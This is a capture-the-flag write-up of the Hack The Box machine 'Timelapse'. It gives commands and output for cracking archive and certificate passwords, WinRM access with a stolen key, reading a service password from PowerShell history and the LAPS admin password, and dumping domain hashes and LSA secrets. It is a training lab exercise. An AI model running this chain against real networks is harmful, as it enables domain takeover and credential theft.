HTB - Timelapse

Enumeration

---

Scope

IP Address: 10.10.11.152

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ nmap -p- --min-rate 10000 $ip -P

PORT     STATE SERVICE      REASON
53/tcp   open  domain       syn-ack
88/tcp   open  kerberos-sec syn-ack
135/tcp  open  msrpc        syn-ack
139/tcp  open  netbios-ssn  syn-ack
389/tcp  open  ldap         syn-ack
445/tcp  open  microsoft-ds syn-ack
464/tcp  open  kpasswd5     syn-ack
5986/tcp open  wsmans       syn-ack
9389/tcp open  adws         syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ nmap -sCV -p53,88,135,139,389,445,464,5986,9389 $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-08 22:57:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2024-07-08T22:58:52+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h00m02s, deviation: 0s, median: 8h00m02s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-07-08T22:58:13
|_  start_date: N/A

* Open ports: 53 - 88 - 135 - 139 - 389 - 445 - 464 - 5986 - 9389
* UDP Open ports: 53 - 88 - 123 - 389
* Services: DNS - KERBEROS - RPC - SMB - winRM over SSL - LDAP
* Important Notes: FQSN: dc01.timelapse.htb - Domain: timelapse.htb

RPC

Nothing from rpc

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

SMB

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ smbclient -N -L //$ip                       

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ smbclient -N \\\\$ip\\shares                                                                                    
smb: \> ls                                                                                                          
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021                                         
6367231 blocks of size 4096. 1252508 blocks available

I will mount the share locally for easily navigation. Press Enter if prompted

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ sudo mount -t cifs "\\\\$ip\\shares" ./mount
Password for root@\\10.10.11.152\shares: 

I will explore each file one by one, Let's start with the .zip file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ tree mount 
mount
├── Dev
│   └── winrm_backup.zip
└── HelpDesk
    ├── LAPS.x64.msi
    ├── LAPS_Datasheet.docx
    ├── LAPS_OperationsGuide.docx
    └── LAPS_TechnicalSpecification.docx

The other files talk about LAPS as a security solutions and how to install it, So we can guess that LAPS is installed on that machine

I tried to unzip it but it was password protected

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ unzip winrm_backup.zip   
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
   skipping: legacyy_dev_auth.pfx    incorrect password

Then, I will attempt to extract the hash from it and try to crack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ zip2john winrm_backup.zip > zip.hash   
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt

<snip>
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
<snip>

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john zip.hash --show                                     
winrm_backup.zip/legacyy_dev_auth.pfx:supremelegacy:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip

Extracting the archive content with 7z

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ 7z x winrm_backup.zip 

<snip>
Enter password (will not be echoed):
Everything is Ok

Size:       2555
Compressed: 2611

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ ls
Nmap  legacyy_dev_auth.pfx  mount   winrm_backup.zip  zip.hash

I searched online for more info about that file and got this.

So, I can extract files like private keys or certificates. We can do this with openssl tool. I also searched for the exact command to what we need and ChatGPT was very useful.

Here are examples of what we can use

openssl pkcs12 -in <file>.pfx -nocerts -out privatekey.pem
openssl pkcs12 -in <file>.pfx -clcerts -nokeys -out certificate.pem
openssl rsa -in privatekey.pem -out privatekey.key
openssl x509 -in certificate.pem -out certificate.crt

When I tried to open the file, it failed cause it was password-protected

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
Enter Import Password:
Mac verify error: invalid password?

So, I will do the same thing as the .zip file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt 

<snip>
thuglegacy       (legacyy_dev_auth.pfx)     
<snip>

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john pfx.hash --show                                     
legacyy_dev_auth.pfx:thuglegacy:::::legacyy_dev_auth.pfx

I'm ready now to get the content of legacyy_dev_auth.pfx

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.pem
openssl x509 -in certificate.pem -out certificate.crt
openssl rsa -in privatekey.pem -out privatekey.key

Showing the extracted files

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ cat privatekey.key 
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz
TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to
pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb
oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3
dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2
qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD
MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW
fAatyP5ry3WLFZKFfF0W9hXw3tBRkUkOOyDIAVMKxmKzguK+BdMIMZLjAZPSUr9j
PJFizeFCB0sR5gvReT9fm/iIidaj16WhidQEPQZ6qf3U6qSbGd5f/KhyqXn1tWnL
GNdwA0ZBYBRaURBOqEIFmpHbuWZCdis20CvzsLB+Q8LClVz4UkmPX1RTFnHTxJW0
Aos+JHMBRuLw57878BCdjL6DYYhdR4kiLlxLVbyXrP+4w8dOurRgxdYQ6iyL4UmU
Ifvrqu8aUdTykJOVv6wWaw5xxH8A31nl/hWt50vEQQKBgQDYcwQvXaezwxnzu+zJ
7BtdnN6DJVthEQ+9jquVUbZWlAI/g2MKtkKkkD9rWZAK6u3LwGmDDCUrcHQBD0h7
tykwN9JTJhuXkkiS1eS3BiAumMrnKFM+wPodXi1+4wJk3YTWKPKLXo71KbLo+5NJ
2LUmvvPDyITQjsoZoGxLDZvLFwKBgQDDjA7YHQ+S3wYk+11q9M5iRR9bBXSbUZja
8LVecW5FDH4iTqWg7xq0uYnLZ01mIswiil53+5Rch5opDzFSaHeS2XNPf/Y//TnV
1+gIb3AICcTAb4bAngau5zm6VSNpYXUjThvrLv3poXezFtCWLEBKrWOxWRP4JegI
ZnD1BfmQNwKBgEJYPtgl5Nl829+Roqrh7CFti+a29KN0D1cS/BTwzusKwwWkyB7o
btTyQf4tnbE7AViKycyZVGtUNLp+bME/Cyj0c0t5SsvS0tvvJAPVpNejjc381kdN
71xBGcDi5ED2hVj/hBikCz2qYmR3eFYSTrRpo15HgC5NFjV0rrzyluZRAoGAL7s3
QF9Plt0jhdFpixr4aZpPvgsF3Ie9VOveiZAMh4Q2Ia+q1C6pCSYk0WaEyQKDa4b0
6jqZi0B6S71un5vqXAkCEYy9kf8AqAcMl0qEQSIJSaOvc8LfBMBiIe54N1fXnOeK
/ww4ZFfKfQd7oLxqcRADvp1st2yhR7OhrN1pfl8CgYEAsJNjb8LdoSZKJZc0/F/r
c2gFFK+MMnFncM752xpEtbUrtEULAKkhVMh6mAywIUWaYvpmbHDMPDIGqV7at2+X
TTu+fiiJkAr+eTa/Sg3qLEOYgU0cSgWuZI0im3abbDtGlRt2Wga0/Igw9Ewzupc8
A5ZZvI+GsHhm0Oab7PEWlRY=
-----END PRIVATE KEY-----

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ cat certificate.crt 
-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA
-----END CERTIFICATE-----

Shell as Legacyy

---

Now, I have private key and certificate, but I don't have any valid credentials, So I must continue the enumeration.

I move the .pfx file to my windows machine and open it to get more information. when I click on the file it opened this wizard

I completed the steps, provided the password and the certificate was stored on my machine. Then, I opened User certification manager

Under Certificates - Current User => Personal => Certificates I could see it

So, We now know that Legacyy User issued this certificate.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ evil-winrm -h

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUB
LIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]                                            
    -S, --ssl                        Enable ssl
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate
    -r, --realm DOMAIN               Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -
> CONTOSO.COM = { kdc = fooserver.contoso.com }
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path
        --spn SPN_PREFIX             SPN prefix for Kerberos auth (default HTTP)
    -e, --executables EXES_PATH      C# executables local path
    -i, --ip IP                      Remote host IP or hostname. FQDN for Kerberos auth (required)                  
    -U, --url URL                    Remote url endpoint (default /wsman)
    -u, --user USER                  Username (required if not using kerberos)
    -p, --password PASS              Password
    -H, --hash HASH                  NTHash
    -P, --port PORT                  Remote host port (default 5985)
    -V, --version                    Show version
    -n, --no-colors                  Disable colors
    -N, --no-rpath-completion        Disable remote path completion
    -l, --log                        Log the WinRM session
    -h, --help                       Display this help message

• I opened the help menu of evil-winrm to see available options

  • -S to enable SSL

  • -k to provide private key

  • -c for certificate

  • -p for port number

I don't know the password but I think it's not required since we have the private key and the certificate, also we must provide alternative port number other than the default because we saw that Nmap output showed 5985 port number is closed but 5986 is opened which is used for winRM over SSl

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ evil-winrm -i $ip -u Legacyy -S -k privatekey.key -c certificate.crt -p Legaccy

*Evil-WinRM* PS C:\Users\legacyy\Documents> 

*Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\Desktop\user.txt
de885f236945cfd319e4dxxxxxxxxxxxx

User Flag: de885f236945cfd319e4dxxxxxxxxxxxx

---

Bloodhound

We're on active directory environment, So I will call bloodhound to join us.

*Evil-WinRM* PS C:\Users\legacyy\Documents> upload SharpHound.exe

*Evil-WinRM* PS C:\Users\legacyy\Documents> .\SharpHound.exe -c all --zipfilename timelapse

<snip>
2024-07-08T17:02:04.7467230-07:00|INFORMATION|Enumeration finished in 00:00:44.6703145
2024-07-08T17:02:04.8873443-07:00|INFORMATION|SharpHound Enumeration Completed at 5:02 PM on 7/8/2024! Happy Graphing!

*Evil-WinRM* PS C:\Users\legacyy\Documents> dir

    Directory: C:\Users\legacyy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         7/8/2024   5:02 PM          12188 20240708170204_timelapse.zip
-a----         7/8/2024   5:02 PM          10603 NzcwYWNhMTEtODlmNS00OTNiLWEyNjAtZDQ2YjczY2QzMDk2.bin
-a----         7/8/2024   5:00 PM         906752 SharpHound.exe

I started smb server on my kail machine and authenticate the windows box to my server

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ smbserver             
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

*Evil-WinRM* PS C:\Users\legacyy\Documents> net use n: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully.

*Evil-WinRM* PS C:\Users\legacyy\Documents> move 20240708170204_timelapse.zip n:

On my kali machine I will start bloodhound and upload the zip file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ sudo neo4j start          
[sudo] password for kali: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:60457). It is available at http://localhost:7474
There may be a short delay until the server is ready.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ bloodhound

Under C:\Users there are several users. I will enumerate them in bloodhound

*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:27 AM                Administrator
d-----       10/25/2021   8:22 AM                legacyy
d-r---       10/23/2021  11:27 AM                Public
d-----       10/25/2021  12:23 PM                svc_deploy
d-----        2/23/2022   5:45 PM                TRX

Shell as SVC_Deploy

SVC_DEPLOY user is a member of LAPS_READERS which has the ability to read LAPS password, which is the password of the local administrator, So if we get this account, we will be able to take control of admin account

When I list the content of C:\Program Files, I can see that LAPS is installed as I guessed

*Evil-WinRM* PS C:\> dir "Program Files"

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:28 AM                Common Files
d-----         3/3/2022  10:01 PM                internet explorer
d-----       10/25/2021   9:01 AM                LAPS
d-----         3/3/2022  10:10 PM                VMware
d-r---         3/3/2022  10:01 PM                Windows Defender
d-----        3/21/2022   8:45 PM                Windows Defender Advanced Threat Protection
d-----         3/3/2022  10:01 PM                Windows Mail
d-----         3/3/2022  10:01 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----         3/3/2022  10:01 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----        9/15/2018  12:19 AM                WindowsPowerShell

I searched for password for user svc_deploy everywhere and I found it in powershell history file of user legacyy

*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

I used the credential found to obtain a shell

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ evil-winrm -i $ip -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -P 5986

<snip>
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

Shell as Administrator

Now, I can read the password of local admin. I will use LAPSToolkit.ps1

*Evil-WinRM* PS C:\Tools> upload LAPSToolkit.ps1
*Evil-WinRM* PS C:\Tools> import-module .\LAPSToolkit.ps1
*Evil-WinRM* PS C:\Tools> Get-LAPSComputers

ComputerName       Password                 Expiration
------------       --------                 ----------
dc01.timelapse.htb K[{h[SYYlK7v3+y.xxxxxxx 07/13/2024 15:49:00

Access the machine with wmisexec.py

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ impacket-wmiexec timelapse.htb/administrator@$ip

Password:                                                                                                                                                  
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\>

The flag wasn't in administrator home directory but was in TRX user home

C:\Users>type C:\Users\TRX\Desktop\root.txt
63cbfac24c2514d221cxxxxxxxxxxxxx

Root Flag: 63cbfac24c2514d221cxxxxxxxxxxxxx

Optional

Dump ntds database

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ crackmapexec smb $ip -u 'administrator'  -p 'K[{h[SYYlK7v3+y.xxxxxxx' --ntds
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\administrator:K[{h[SYYlK7v3+y.gN2i1dq6 (Pwn3d!)
SMB         10.10.11.152    445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.11.152    445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c633191d8a151f59e17bd18ac49603d:::
SMB         10.10.11.152    445    DC01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.152    445    DC01             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2960d580f05cd511b3da3d3663f3cb37:::
SMB         10.10.11.152    445    DC01             timelapse.htb\thecybergeek:1601:aad3b435b51404eeaad3b435b51404ee:c81875d2b3cd404f3c8eadc820248f06:::
SMB         10.10.11.152    445    DC01             timelapse.htb\payl0ad:1602:aad3b435b51404eeaad3b435b51404ee:f63b1edaad2ee253c3c228c6e08d1ea0:::
SMB         10.10.11.152    445    DC01             timelapse.htb\legacyy:1603:aad3b435b51404eeaad3b435b51404ee:93da975bcea111839cc584f2f528d63e:::
SMB         10.10.11.152    445    DC01             timelapse.htb\sinfulz:1604:aad3b435b51404eeaad3b435b51404ee:72b236d9b0d49860267f752f1dfc8103:::
SMB         10.10.11.152    445    DC01             timelapse.htb\babywyrm:1605:aad3b435b51404eeaad3b435b51404ee:d47c7e33d6911bb742fdf040af2e80da:::
SMB         10.10.11.152    445    DC01             timelapse.htb\svc_deploy:3103:aad3b435b51404eeaad3b435b51404ee:c912f3533b7114980dd7b6094be1a9d8:::
SMB         10.10.11.152    445    DC01             timelapse.htb\TRX:5101:aad3b435b51404eeaad3b435b51404ee:4c7121d35cd421cbbd3e44ce83bc923e:::
SMB         10.10.11.152    445    DC01             DC01$:1000:aad3b435b51404eeaad3b435b51404ee:f2a0c7ce9c3eb681fe94927241abf796:::
SMB         10.10.11.152    445    DC01             DB01$:1606:aad3b435b51404eeaad3b435b51404ee:d9c629d35e3311abba1631dba29ead96:::
SMB         10.10.11.152    445    DC01             WEB01$:1607:aad3b435b51404eeaad3b435b51404ee:3b2910d8e6c79bbb20e8842ea4a9aeac:::
SMB         10.10.11.152    445    DC01             DEV01$:1608:aad3b435b51404eeaad3b435b51404ee:463c7639ff204594dfbebbe71b3c6dbb:::
SMB         10.10.11.152    445    DC01             [+] Dumped 14 NTDS hashes to /home/kali/.cme/logs/DC01_10.10.11.152_2024-07-08_135412.ntds of which 10 were added to the database

Dump lsass process

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ crackmapexec smb $ip -u 'administrator'  -p 'K[{h[SYYlK7v3+y.xxxxxxxx' --lsa
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\administrator:K[{h[SYYlK7v3+y.gN2i1dq6 (Pwn3d!)
SMB         10.10.11.152    445    DC01             [+] Dumping LSA secrets
SMB         10.10.11.152    445    DC01             TIMELAPSE\DC01$:aes256-cts-hmac-sha1-96:497759614428ad680741f46f137c38dde0a3c93d9e937c31aae3fafee717e881
SMB         10.10.11.152    445    DC01             TIMELAPSE\DC01$:aes128-cts-hmac-sha1-96:037c03ecb94020155cae4538792838a0
SMB         10.10.11.152    445    DC01             TIMELAPSE\DC01$:des-cbc-md5:042c43759470084a
SMB         10.10.11.152    445    DC01             TIMELAPSE\DC01$:plain_password_hex:a3ee63eba14d0ef5dc110f66025c3c47d0c33bf18ca9b0a376eb94fecb20264f6956d662d3e946f482ccb123406d46a5b7ca62a1b8098a1299ed2fbdcae78b50dcd47c9362d1e8f8fc9beaa15c0b8412984c4d73c7a936ffc2c54dd7effcd0e84e483eda39b1499a578fbb302fe325c30ea41add8ed85e1b8b6efc670f173cc2b174771dfc48a18ade69c57c9c6739d5b16ebff18d31e9cef3f0930d08a4730c34bd113ad16c24190ea3d13b397fd701f8ffb2ed01636c7efeba9567b95c6169fbafe452d6c7bd136499192b1a76fd8dc085d1f48516dd74ff1e21e9cfdf981ed5c7327a2cb00943cc93536543f779ee
SMB         10.10.11.152    445    DC01             TIMELAPSE\DC01$:aad3b435b51404eeaad3b435b51404ee:f2a0c7ce9c3eb681fe94927241abf796:::
SMB         10.10.11.152    445    DC01             dpapi_machinekey:0xbc6b4be0de66f262c75df7ae4f7dadf34fa03ddc
dpapi_userkey:0x074fe8860a0fbca40b902c409998b1b9cd332cd1
SMB         10.10.11.152    445    DC01             NL$KM:ae8cbd2f8ab948875ff21e2c4214575e90e61caccd234226ced71fb5d37fd6446b297b58ff89bda74596ef5a96b1e1071f719d9d0fe11d1e3a95dd4f13a9a692
SMB         10.10.11.152    445    DC01             [+] Dumped 7 LSA secrets to /home/kali/.cme/logs/DC01_10.10.11.152_2024-07-08_135833.secrets and /home/kali/.cme/logs/DC01_10.10.11.152_2024-07-08_135833.cached